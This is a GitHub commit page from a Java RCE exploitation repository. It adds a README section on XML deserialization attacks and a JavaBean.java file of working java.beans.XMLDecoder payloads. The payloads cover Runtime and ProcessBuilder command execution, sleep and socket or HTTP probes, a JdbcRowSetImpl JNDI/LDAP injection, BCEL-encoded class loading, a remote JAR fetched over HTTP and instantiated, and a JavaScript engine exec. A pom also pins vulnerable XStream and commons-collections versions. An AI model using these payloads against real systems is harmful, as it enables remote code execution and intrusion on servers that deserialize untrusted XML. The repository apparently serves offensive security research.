Skip to content

Commit 64d8c51

Browse files
WhoopsunixWhoopsunix
committed
add XMLSerialization :)
1 parent 2dd9a4e commit 64d8c51

File tree

7 files changed

+395
-35
lines changed

7 files changed

+395
-35
lines changed

README.md

+42-6
Original file line numberDiff line numberDiff line change
@@ -4,29 +4,35 @@ By. Whoopsunix
44

55
# 0x00 do what?
66

7-
🚀 对照实战场景梳理较通用的 Java Rce 相关漏洞的利用方式
7+
🚀 记录贴 对照实战场景梳理较通用的 Java Rce 相关漏洞的利用方式或知识点
88

9-
🚩 对于研究过的组件会针对可利用版本进行一个梳理 详情见代码
9+
🚩 对于实际环境遇到过的组件如有必要会针对可利用版本进行一个梳理 详情见代码
1010

1111
🚧 长期项目 不定期学习后更新......
1212

1313
## 目录
1414

15-
- [命令执行](#0x01-command)
15+
- [0x01 命令执行](#0x01-command)
1616
- 执行Demo,java jsp
1717
- 执行结果输出(InputStream 处理Demo)
18-
- [表达式注入](#0x02-expression-inject)
18+
- [0x02 表达式注入](#0x02-expression-inject)
1919
- [OGNL](#ognl)
2020
- [EL](#el)
2121
- [com.example.spelattack.SPEL](#spel)
22-
- [JDBC Attack](#0x03-jdbc-attack)
22+
- [0x03 JDBC Attack](#0x03-jdbc-attack)
2323
- [Mysql](#mysql)
2424
- [PostgreSQL](#postgresql)
2525
- [H2database](#h2database)
2626
- [IBM DB2](#ibmdb2)
2727
- [ModeShape](#modeshape)
2828
- [Apache Derby](#apache-derby)
2929
- [Sqlite](#sqlite)
30+
- [0x04 Serialization](#0x04-serialization)
31+
- [BCEL](#bcel)
32+
- [远程Jar加载](#remotejar)
33+
- [XMLSerialization](#xmlserialization)
34+
- [JavaBean](#jarbean)
35+
- [XStream](#xstream)
3036
- [鸣谢](#Thanks)
3137

3238
目前涵盖:命令执行及输出、表达式及输出、JDBC
@@ -125,6 +131,36 @@ By. Whoopsunix
125131

126132
- [x] RCE
127133

134+
# 0x04 [Serialization](Serialization)
135+
136+
## [BCEL](Serialization/BCELAttack)
137+
138+
- [x] static 触发
139+
- [x] 构造方法触发
140+
- [x] 方法触发
141+
142+
## [RemoteJar](Serialization/AttackJar)
143+
144+
- [x] static 触发
145+
- [x] 构造方法触发
146+
- [x] 方法触发
147+
148+
## [XMLSerialization](Serialization/XMLSerialization)
149+
150+
### [JarBean](Serialization/XMLSerialization/JavaBean)
151+
152+
- [x] 命令执行 Runtime、ProcessBuilder、js
153+
- [x] 探测用Payload
154+
- DNSLOG、SOCKETLOG
155+
- 延时
156+
- [x] JNDI
157+
- [x] BCEL
158+
- [x] RemoteJar
159+
160+
### XStream
161+
162+
主要为 CVE 不具体展开
163+
128164
# Thanks
129165

130166
感谢师傅们的研究 带来了很大的帮助 :)
@@ -139,4 +175,4 @@ By. Whoopsunix
139175
>
140176
> https://forum.butian.net/share/886
141177
>
142-
> https://github.com/woodpecker-appstore/jexpr-encoder-utils
178+
> https://github.com/woodpecker-appstore

Serialization/XMLSerialization/JavaBean/pom.xml

+42
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
4+
5+
<groupId>org.example</groupId>
6+
<artifactId>JavaBean</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>jar</packaging>
9+
10+
<name>JavaBean</name>
11+
12+
<properties>
13+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14+
</properties>
15+
16+
<dependencies>
17+
<dependency>
18+
<groupId>junit</groupId>
19+
<artifactId>junit</artifactId>
20+
<version>3.8.1</version>
21+
<scope>test</scope>
22+
</dependency>
23+
</dependencies>
24+
25+
<build>
26+
<plugins>
27+
<plugin>
28+
<groupId>org.springframework.boot</groupId>
29+
<artifactId>spring-boot-maven-plugin</artifactId>
30+
</plugin>
31+
<plugin>
32+
<groupId>org.apache.maven.plugins</groupId>
33+
<artifactId>maven-compiler-plugin</artifactId>
34+
<version>3.8.1</version>
35+
<configuration>
36+
<source>1.8</source>
37+
<target>1.8</target>
38+
</configuration>
39+
</plugin>
40+
</plugins>
41+
</build>
42+
</project>

Serialization/XMLSerialization/JavaBean/src/main/java/org/example/JavaBean.java

+186
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,186 @@
1+
package org.example;
2+
3+
import java.beans.XMLDecoder;
4+
import java.io.ByteArrayInputStream;
5+
6+
/**
7+
* @author Whoopsunix
8+
*/
9+
public class JavaBean {
10+
public static void main(String[] args) {
11+
/**
12+
* 命令执行
13+
*/
14+
// ProcessBuilder
15+
String processBuilder = "<java>\n" +
16+
" <object class=\"java.lang.ProcessBuilder\">\n" +
17+
" <array class=\"java.lang.String\" length=\"3\" >\n" +
18+
" <void index=\"0\">\n" +
19+
" <string>/bin/sh</string>\n" +
20+
" </void>\n" +
21+
" <void index=\"1\">\n" +
22+
" <string>-c</string>\n" +
23+
" </void>\n" +
24+
" <void index=\"2\">\n" +
25+
" <string>open -a Calculator.app</string>\n" +
26+
" </void>\n" +
27+
" </array>\n" +
28+
" <void method=\"start\"/>\n" +
29+
" </object>\n" +
30+
"</java>";
31+
// runtime
32+
String runtime= "<java>\n" +
33+
" <object class=\"java.lang.Runtime\" method=\"getRuntime\">\n" +
34+
" <void method=\"exec\">\n" +
35+
" <array class=\"java.lang.String\" length=\"3\" >\n" +
36+
" <void index=\"0\">\n" +
37+
" <string>/bin/sh</string>\n" +
38+
" </void>\n" +
39+
" <void index=\"1\">\n" +
40+
" <string>-c</string>\n" +
41+
" </void>\n" +
42+
" <void index=\"2\">\n" +
43+
" <string>open -a Calculator.app</string>\n" +
44+
" </void>\n" +
45+
" </array>\n" +
46+
" <void>\n" +
47+
" <void method=\"start\"/>\n" +
48+
" </object>\n" +
49+
"</java>";
50+
51+
/**
52+
* 延时
53+
*/
54+
String sleep = "<java>\n" +
55+
" <object class=\"java.lang.Thread\">\n" +
56+
" <void method=\"sleep\">\n" +
57+
" <long>10000</long>\n" +
58+
" </void>\n" +
59+
" </object>\n" +
60+
"</java>";
61+
62+
/**
63+
* 探测
64+
*/
65+
String HTTPLOG = "<java>\n" +
66+
" <new class=\"java.net.URL\">\n" +
67+
" <string>http://hostname</string>\n" +
68+
" <void method=\"getContent\"/>\n" +
69+
" </new>\n" +
70+
"</java>";
71+
72+
String SOCKETLOG = "<java>\n" +
73+
"<object class=\"java.net.Socket\">\n" +
74+
" <string>127.0.0.1</string>\n" +
75+
" <int>1234</int>\n" +
76+
"</object>\n" +
77+
"</java>";
78+
79+
/**
80+
* jndi todo 还需要完善其他情况
81+
*/
82+
String jndi = "<java>\n" +
83+
" <void class=\"com.sun.rowset.JdbcRowSetImpl\">\n" +
84+
" <void property=\"dataSourceName\">\n" +
85+
" <string>ldap://127.0.0.1:1389/Basic/Command/open -a Calculator.app</string>\n" +
86+
" </void>\n" +
87+
" <void property=\"autoCommit\">\n" +
88+
" <boolean>true</boolean>\n" +
89+
" </void>\n" +
90+
" </void>\n" +
91+
"</java>";
92+
93+
/**
94+
* BCEL
95+
*/
96+
// static
97+
String bcel = "<java>\n" +
98+
" <void class =\"com.sun.org.apache.bcel.internal.util.ClassLoader\">\n" +
99+
" <void method=\"loadClass\">\n" +
100+
" <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$AePMO$c2$40$U$9c$85B$a1$96$af$o$f8$adx$SL$84$Y$8f$Q$P$S$bdH$d4$88$c1$f3R7uIi$9b$d2$g$fe$91g$$j$3c$f8$D$fcQ$c6$d7J$90$e8$kv$f6$cd$9b$99$b7$bb$9f_$ef$l$A$8e$b1$a7A$85$a1$a1$8c$d5$M$w$RVU$ac$a9XW$b1$c1$90$eeHG$G$a7$M$c9zc$c0$a0t$dd$H$c1P$e8IG$5c$85$e3$a1$f0$ef$f8$d0$s$c6$e8$b9$s$b7$H$dc$97Q$3d$t$95$e0QN$e2$9eo$b5$c4$94$8f$3d$5b$b4$ce$a7$c2l3d$3a$a6$3d$8f$d6$fan$e8$9b$e2BF$9el$d4o$8e$f8$T$d7$91AV$c5$a6$8e$zl3T$5dO8$b5$p$5e$ebr$db$Mm$k$b8$7e$93$7b$9e$8e$j$ec2$94$pG$cb$e6$8eE$DL$e1$F$d2u$Y$8a$7f$H$T$f5$x$bc$k$8e$84$Z0$94$7e$a9$db$d0$J$e4$98$ae$a1Y$oX$U$95z$a3$f7OCoPD$iyP_$ea$f6$D_$3aV$7b$d9p$e3$bb$a6$98L$da$d8G$9a$fe$3aZ$J$b0$e8u$b4kT$9d$Q2$c2$d4$e1$x$d8$yn$af$d0$ae$R$82$M$KIu$3a$e9$3f$o$e4$90$t$cc$a0$b0$I8$8b$D$81$fc$h$SF$f2$F$ca$fd3$94$cbY$cce$c9$97$9a$t$g$94$V$e5d$vA$a7$9c$ie$e8$f1$3c$90$b6$Y$9fJ$df$e0$d7r$ac$g$C$A$A</string>\n" +
101+
" <void method=\"newInstance\"/>\n" +
102+
" </void>\n" +
103+
" </void>\n" +
104+
"</java>";
105+
106+
// 通过构造方法传入,具体参考 BCEL demo
107+
String bcelArg = "<java>\n" +
108+
" <new class =\"com.sun.org.apache.bcel.internal.util.ClassLoader\">\n" +
109+
" <void method=\"loadClass\">\n" +
110+
" <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$Am$91MO$c2$40$Q$86$df$a5$c5j$a9$96$82$e0$b7$c6$93$a0$89$8d$f1$8811$GO$f5$pb$f0$e4$a1$94M$5d$d2$PR$8a$e1$ly$e6$a2$c6$83$3f$c0$le$9c$F$o$s$d0$c3$cc$ce$3b$ef$3e3$9b$7e$ff$7c$7e$B8$c1$9e$8e$F$Uu$ac$a2$qCY$c3$9a$86u$N$h$M$Lg$o$S$e99$83R$a96$Z$d4$cb$b8$cd$ZLGD$fc$a6$l$b6x$f2$e0$b6$CR$KN$ec$b9A$d3M$84$ac$t$a2$9a$3e$8b$kC$c9$89$T$df$e6$D7$ec$G$dc$ae$P$b8w$91$f85$d2$xN$c7$7dq$ed$c0$8d$7c$bb$91$s$o$f2kr$88$e2$85mI$9ci2$e8$8d$b8$9fx$fcJH$bc1A$jK$a3$B$N$8b$g6$Nla$db$c0$Ov$Z$8aSB$7d$e0$f1n$w$e2$88$d49$db0$e4$a7$de$dbV$87$7b$v$835$95$ee$fbQ$wB$9a$a9$fb$3c$fd$xJ$95$aa3$e3$a1$zUNT$86$83y$ef$fb$t$dd$r$b1$c7$7b$bd$g$f6$91$a5$l$m$bf$M$98$7c$H$c5$r$aaN$v3$ca$d9$c3w$b0$e1$a8$adS$d4$v$83l$w$Zst2$c6$s$ca$cb$94$r$60e$Cx$o$a7B$d9$92$80$Pd$8e$de$a0$3c$beB$bd$k$92A$a5$L$s$c51$b4L$A$89$96$aaA$A$93$60y$8a$b9QO$O$b4$s$D$e4$c9$a4$9e$dc$cd$g$zU$f8$F$P$W$$$EJ$C$A$A</string>\n" +
111+
" <void method=\"getConstructor\">\n" +
112+
" <array class=\"java.lang.Class\" length=\"1\">\n" +
113+
" <void index=\"0\"><class><string>java.lang.String</string></class></void>\n" +
114+
" </array>\n" +
115+
" <void method=\"newInstance\">\n" +
116+
" <array class=\"java.lang.Object\" length=\"1\">\n" +
117+
" <void index=\"0\"><string>open -a Calculator.app</string></void>\n" +
118+
" </array>\n" +
119+
" </void>\n" +
120+
" </void>\n" +
121+
" </void>\n" +
122+
" </new>\n" +
123+
"</java>";
124+
125+
/**
126+
* load jar
127+
*/
128+
// static
129+
String loadJar = "<java>\n" +
130+
" <new class=\"java.net.URLClassLoader\">\n" +
131+
" <array class=\"java.net.URL\" length=\"1\">\n" +
132+
" <void index=\"0\"><object class=\"java.net.URL\"><string>http://127.0.0.1:1234/AttackJar-1.0.jar</string></object></void>\n" +
133+
" </array>\n" +
134+
" <void method=\"loadClass\">\n" +
135+
" <string>org.example.Exec</string>\n" +
136+
" <void method=\"newInstance\"/>\n" +
137+
" </void>\n" +
138+
" </new>\n" +
139+
"</java>";
140+
// 通过构造方法传入,具体参考 AttackJar demo
141+
String loadJarArg = "<java>\n" +
142+
" <new class=\"java.net.URLClassLoader\">\n" +
143+
" <array class=\"java.net.URL\" length=\"1\">\n" +
144+
" <void index=\"0\"><object class=\"java.net.URL\"><string>http://127.0.0.1:1234/AttackJar-1.0.jar</string></object></void>\n" +
145+
" </array>\n" +
146+
" <void method=\"loadClass\">\n" +
147+
" <string>org.example.ExecArg</string>\n" +
148+
" <void method=\"getConstructor\">\n" +
149+
" <array class=\"java.lang.Class\" length=\"1\">\n" +
150+
" <void index=\"0\"><class><string>java.lang.String</string></class></void>\n" +
151+
" </array>\n" +
152+
" <void method=\"newInstance\">\n" +
153+
" <array class=\"java.lang.Object\" length=\"1\">\n" +
154+
" <void index=\"0\"><string>open -a Calculator.app</string></void>\n" +
155+
" </array>\n" +
156+
" </void>\n" +
157+
" </void>\n" +
158+
" </void>\n" +
159+
" </new>\n" +
160+
"</java>";
161+
162+
/**
163+
* js
164+
*/
165+
String js = "<java>\n" +
166+
" <new class=\"javax.script.ScriptEngineManager\">\n" +
167+
" <void method=\"getEngineByName\">\n" +
168+
" <string>js</string>\n" +
169+
" <void method=\"eval\">\n" +
170+
" <string><![CDATA[java.lang./**/Runtime./**/getRuntime().exec('open /System/Applications/Calculator.app');]]></string>\n" +
171+
" </void>\n" +
172+
" </void>\n" +
173+
" </new>\n" +
174+
"</java>";
175+
176+
xmlDecoder(js);
177+
}
178+
179+
public static Object xmlDecoder(String payload) {
180+
System.out.println(payload);
181+
XMLDecoder xmlDecoder = new XMLDecoder(new ByteArrayInputStream(payload.getBytes()));
182+
Object obj = xmlDecoder.readObject();
183+
xmlDecoder.close();
184+
return obj;
185+
}
186+
}

Serialization/XMLSerialization/XStreamAttack/pom.xml

+31
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
4+
5+
<groupId>org.example</groupId>
6+
<artifactId>XStreamAttack</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>jar</packaging>
9+
10+
<name>XStreamAttack</name>
11+
12+
<properties>
13+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14+
</properties>
15+
16+
<dependencies>
17+
<dependency>
18+
<groupId>com.thoughtworks.xstream</groupId>
19+
<artifactId>xstream</artifactId>
20+
<version>1.4.17</version>
21+
</dependency>
22+
23+
<dependency>
24+
<groupId>commons-collections</groupId>
25+
<artifactId>commons-collections</artifactId>
26+
<version>3.2.1</version>
27+
</dependency>
28+
</dependencies>
29+
30+
31+
</project>

Serialization/XMLSerialization/pom.xml

+14-29
Original file line numberDiff line numberDiff line change
@@ -1,37 +1,22 @@
11
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2-
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3-
<modelVersion>4.0.0</modelVersion>
2+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
3+
<modelVersion>4.0.0</modelVersion>
44

5-
<groupId>org.example</groupId>
6-
<artifactId>XMLSerialization</artifactId>
7-
<version>1.0-SNAPSHOT</version>
8-
<packaging>jar</packaging>
5+
<groupId>org.example</groupId>
6+
<artifactId>XMLSerialization</artifactId>
7+
<version>1.0-SNAPSHOT</version>
8+
<packaging>pom</packaging>
99

10-
<name>XMLSerialization</name>
10+
<name>XMLSerialization</name>
1111

12-
<properties>
13-
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
14-
</properties>
12+
<modules>
13+
<module>JavaBean</module>
14+
<module>XStreamAttack</module>
15+
</modules>
1516

16-
<dependencies>
17+
<properties>
18+
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
19+
</properties>
1720

18-
</dependencies>
1921

20-
<build>
21-
<plugins>
22-
<plugin>
23-
<groupId>org.springframework.boot</groupId>
24-
<artifactId>spring-boot-maven-plugin</artifactId>
25-
</plugin>
26-
<plugin>
27-
<groupId>org.apache.maven.plugins</groupId>
28-
<artifactId>maven-compiler-plugin</artifactId>
29-
<version>3.8.1</version>
30-
<configuration>
31-
<source>1.8</source>
32-
<target>1.8</target>
33-
</configuration>
34-
</plugin>
35-
</plugins>
36-
</build>
3722
</project>

0 commit comments

Comments
 (0)